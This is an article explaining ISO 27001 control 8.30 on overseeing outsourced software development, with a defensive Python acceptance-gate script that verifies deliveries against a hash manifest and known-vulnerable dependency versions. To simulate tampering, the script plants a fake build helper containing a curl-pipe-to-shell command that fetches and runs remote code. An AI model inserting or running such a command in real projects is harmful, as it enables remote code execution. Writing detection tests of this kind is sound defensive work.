
ISO 27001 Control 8.30: Outsourced Development

By Alan Parker

Directing, Monitoring, and Reviewing Outsourced System Development Activities

The purpose of this control is to ensure that the information security measures the organisation requires are actually implemented when system development is outsourced. That means defining security expectations up front, fixing them in the contract, and overseeing the external development work continuously so that it stays aligned with security and compliance requirements.



Guidance

When system development is outsourced, the organisation must establish clear requirements and expectations with external suppliers and continuously monitor and review whether the delivered work meets these expectations. Regular assessment and improvement of supplier relationships ensure that risks associated with outsourced development are minimised. The following aspects should be considered across the organisation’s entire external supply chain:


1. Licensing Agreements and Intellectual Property Rights

  • Define ownership of the developed code and related intellectual property to avoid conflicts over future use and modifications.

  • Establish licensing agreements that explicitly state permitted usage, redistribution rights, and any restrictions on modifications.

  • Ensure that agreements cover liability clauses in case of disputes regarding intellectual property ownership.


2. Contractual Requirements for Secure Development

  • Ensure contracts include provisions for secure design, coding, and testing practices to mitigate security risks at every stage of development.

  • Reference recognised security standards such as the OWASP ASVS and the related ISO 27001 Annex A controls 8.25 to 8.29 (secure development lifecycle through to security testing), so that the supplier is held to the same measures as internal development teams.

  • Specify accountability measures for non-compliance with security requirements and establish penalties for security breaches resulting from negligence.


3. Threat Modelling Considerations

  • Provide external developers with the relevant threat models to ensure security risks are appropriately mitigated.

  • Require developers to conduct their own threat modelling assessments and document security risk considerations.

  • Establish a feedback loop where internal security teams review and validate external threat models.


4. Acceptance Testing for Quality and Security

  • Conduct rigorous acceptance testing to validate the quality, accuracy, and security of deliverables (see control 8.29).

  • Develop clear acceptance criteria for security functionality, ensuring all security features are properly implemented and tested before deployment.

  • Include penetration testing and vulnerability assessments in the acceptance process, with acceptance conditional on the findings being remediated or formally risk-accepted before going live.


5. Security and Privacy Assurance Reports

  • Require suppliers to provide assurance reports demonstrating compliance with minimum security and privacy requirements.

  • Review independent assurance such as SOC 2 Type II reports and ISO 27001 certification, together with evidence of GDPR compliance (GDPR is a legal obligation rather than a certification), and check that the scope of each report or certificate actually covers the development service being purchased.

  • Request security audit reports and documented evidence of security practices in the supplier’s development lifecycle.


6. Testing for Malicious and Unintentional Content

  • Ensure that deliverables undergo sufficient testing to detect and mitigate malicious content, whether intentional or accidental.

  • Run automated static analysis and software composition analysis on the deliverable to detect backdoors, hard-coded credentials, unexpected network calls, and unintentional vulnerabilities; where binaries are delivered, confirm they were built from the reviewed source (for example, through reproducible builds or a build performed in the organisation's own environment).

  • Require suppliers to provide evidence of internal security testing, including static and dynamic analysis results.


7. Testing for Known Vulnerabilities

  • Verify that outsourced software, including the third-party libraries the supplier bundles with it, has been tested against known vulnerabilities and weaknesses, such as those in the OWASP Top 10 and published CVE records.

  • Implement regular vulnerability scanning and penetration testing schedules for outsourced applications and components.

  • Require suppliers to operate a vulnerability handling and disclosure process with contractual notification timescales, so that issues discovered after delivery are reported and fixed promptly.
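The checks in sections 6 and 7 are usually automated as an acceptance gate that runs before anyone reviews a delivery by hand. The script below is an added example, not code from the original article or from any supplier: it verifies a delivery against a supplier-provided SHA-256 manifest (flagging modified, missing and, importantly, unlisted files), parses a pinned lock file, and compares the pins with an advisory list. The sample files, the manifest, the planted unlisted file and the two-entry advisory excerpt are constructed for the example; in practice the advisory data comes from a maintained feed such as NVD or OSV and the lock file format depends on the supplier's toolchain.

```python
"""Acceptance gate for an outsourced deliverable (added example, not from the article).

Before a delivery is accepted it checks that:
  1. every file in the supplier's SHA-256 manifest is present and unmodified,
  2. no file outside the manifest has been slipped into the delivery,
  3. every dependency in the lock file is pinned and outside known-vulnerable ranges.
All sample content, the manifest and the advisory list are constructed for the example.
"""
import hashlib
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

# Constructed delivery contents: relative path -> file text.
SAMPLE_FILES = {
    "app/main.py": "def handler(req):\n    return 'ok'\n",
    "app/requirements.lock": "requests==2.19.0\nflask==3.0.3\npyyaml==5.3\n",
}
# A file added after the manifest was produced (simulated tampering); it must be reported.
UNLISTED_FILE = ("app/.build_helper.py", "import os\nos.system('curl http://203.0.113.9/x | sh')\n")
# Advisory excerpt: (package, first fixed version, reference). Illustrative subset only;
# a real gate reads this from a maintained feed (NVD, OSV), not a hand-written list.
KNOWN_VULNERABLE = [
    ("requests", "2.20.0", "CVE-2018-18074"),
    ("pyyaml", "5.4", "CVE-2020-14343"),
]

def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def list_files(root: Path) -> Dict[str, Path]:
    """Relative POSIX path -> path for every regular file under root (dotfiles included)."""
    return {p.relative_to(root).as_posix(): p for p in root.rglob("*") if p.is_file()}

def build_manifest(root: Path) -> Dict[str, str]:
    """What the supplier ships with the delivery: relative path -> SHA-256 hex digest."""
    return {rel: sha256_file(p) for rel, p in list_files(root).items()}

def verify_integrity(root: Path, manifest: Dict[str, str]) -> List[str]:
    findings = []
    actual = list_files(root)
    for rel, expected in sorted(manifest.items()):
        if rel not in actual:
            findings.append(f"MISSING {rel}")
        elif sha256_file(actual[rel]) != expected:
            findings.append(f"MODIFIED {rel}")
    # Extra files are findings too: integrity means "nothing extra", not just "nothing changed".
    for rel in sorted(set(actual) - set(manifest)):
        findings.append(f"UNLISTED {rel}")
    return findings

def version_tuple(v: str) -> Tuple[int, ...]:
    return tuple(int(x) for x in v.split("."))

def parse_lock(text: str) -> Tuple[Dict[str, str], List[str]]:
    """Parse 'name==version' lines; unpinned or malformed lines become findings, not silent skips."""
    pins, findings = {}, []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = re.fullmatch(r"([A-Za-z0-9_.-]+)==(\d+(?:\.\d+)*)", line)
        if m:
            pins[m.group(1).lower()] = m.group(2)
        else:
            findings.append(f"UNPINNED {line}")
    return pins, findings

def vulnerability_findings(pins: Dict[str, str], advisories) -> List[str]:
    out = []
    for name, fixed, ref in advisories:
        if name in pins and version_tuple(pins[name]) < version_tuple(fixed):
            out.append(f"VULNERABLE {name}=={pins[name]} (fixed in {fixed}, {ref})")
    return out

def run_gate(root: Path, manifest: Dict[str, str], advisories, lock_rel="app/requirements.lock"):
    """Return (accepted, findings). Any finding blocks acceptance."""
    findings = verify_integrity(root, manifest)
    lock = root / lock_rel
    if lock.is_file():
        pins, lock_findings = parse_lock(lock.read_text())
        findings += lock_findings + vulnerability_findings(pins, advisories)
    else:
        findings.append(f"MISSING {lock_rel}")
    return not findings, findings

def build_sample_delivery(tamper: bool = True) -> Tuple[Path, Dict[str, str]]:
    """Write the constructed delivery to a temp dir; the manifest is computed before tampering."""
    root = Path(tempfile.mkdtemp(prefix="delivery-"))
    for rel, text in SAMPLE_FILES.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(text)
    manifest = build_manifest(root)
    if tamper:
        (root / UNLISTED_FILE[0]).write_text(UNLISTED_FILE[1])
    return root, manifest

if __name__ == "__main__":
    root, manifest = build_sample_delivery()
    accepted, findings = run_gate(root, manifest, KNOWN_VULNERABLE)
    print("ACCEPTED" if accepted else "REJECTED")
    for f in findings:
        print(" -", f)
```

Run as-is, the gate rejects the constructed delivery for three reasons: the planted `.build_helper.py` is not in the manifest, and two pins fall below the fixed versions. Two design points matter more than the code: the manifest must come from the supplier over a channel separate from the delivery itself (otherwise whoever tampers with the files can regenerate it), and a floating requirement is treated as a finding because a version that is not pinned cannot be checked against anything.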


8. Escrow Agreements for Source Code

  • Establish escrow agreements to protect business continuity in case the supplier goes out of business or is unable to maintain the software.

  • Ensure that the escrow agreement covers the latest source code, build instructions and toolchain details, and development documentation, and require periodic verification that the deposited material actually builds into the delivered product; an unverified escrow deposit is of little value at the moment it is invoked.

  • Specify under what circumstances the escrow agreement can be invoked and define the process for transitioning maintenance responsibilities to another provider.


9. Right to Audit Development Processes

  • Include contractual provisions granting the organisation the right to audit the supplier’s development processes and security controls.

  • Perform periodic security audits and compliance assessments to verify that the supplier adheres to agreed security practices.

  • Establish a structured reporting process where suppliers regularly provide security updates, risk assessments, and mitigation plans.


10. Security of the Development Environment

  • Ensure that the supplier’s development environment meets security requirements, including access control, data protection, and secure coding practices (see control 8.31).

  • Require developers to use secure development environments (e.g., isolated build environments, restricted network access, and robust authentication mechanisms).

  • Specify requirements for secure configuration management, ensuring that development, testing, and production environments remain separate and protected.


11. Compliance with Legal and Regulatory Requirements

  • Consider applicable legislation related to data protection, cybersecurity, and intellectual property rights to ensure compliance.

  • Ensure that suppliers adhere to local and international regulatory requirements, including GDPR, HIPAA, PCI DSS, and any industry-specific mandates.

  • Implement a legal review process to verify that contractual obligations align with current compliance frameworks and evolving regulations.


Continuous Improvement and Review

To maintain high security standards in outsourced development, organisations should:

  • Establish a regular review cycle to assess the effectiveness of security controls in supplier relationships.

  • Encourage continuous improvement in security practices through collaborative engagement with suppliers.

  • Develop contingency plans for supplier failures, ensuring that security risks do not disrupt business operations.


Additional Resources

For more comprehensive guidance on supplier relationships, organisations should refer to the ISO/IEC 27036 series, which provides detailed recommendations on managing security risks in supplier relationships. Regular engagement with industry groups and security communities can also help in staying informed about evolving threats and best practices in outsourced development security.



About the author

Alan Parker is an IT consultant and project manager who specialises in IT governance, process implementation, and project delivery. With over 30 years of experience in the industry, Alan believes that simplifying complex challenges and avoiding pitfalls are key to successful IT management. He has led various IT teams and projects across multiple organisations, continually honing his expertise in ITIL and PRINCE2 methodologies. Alan holds a degree in Information Systems and has been recognised for his ability to deliver reliable and effective IT solutions. He lives in Berkshire, UK, with his family.
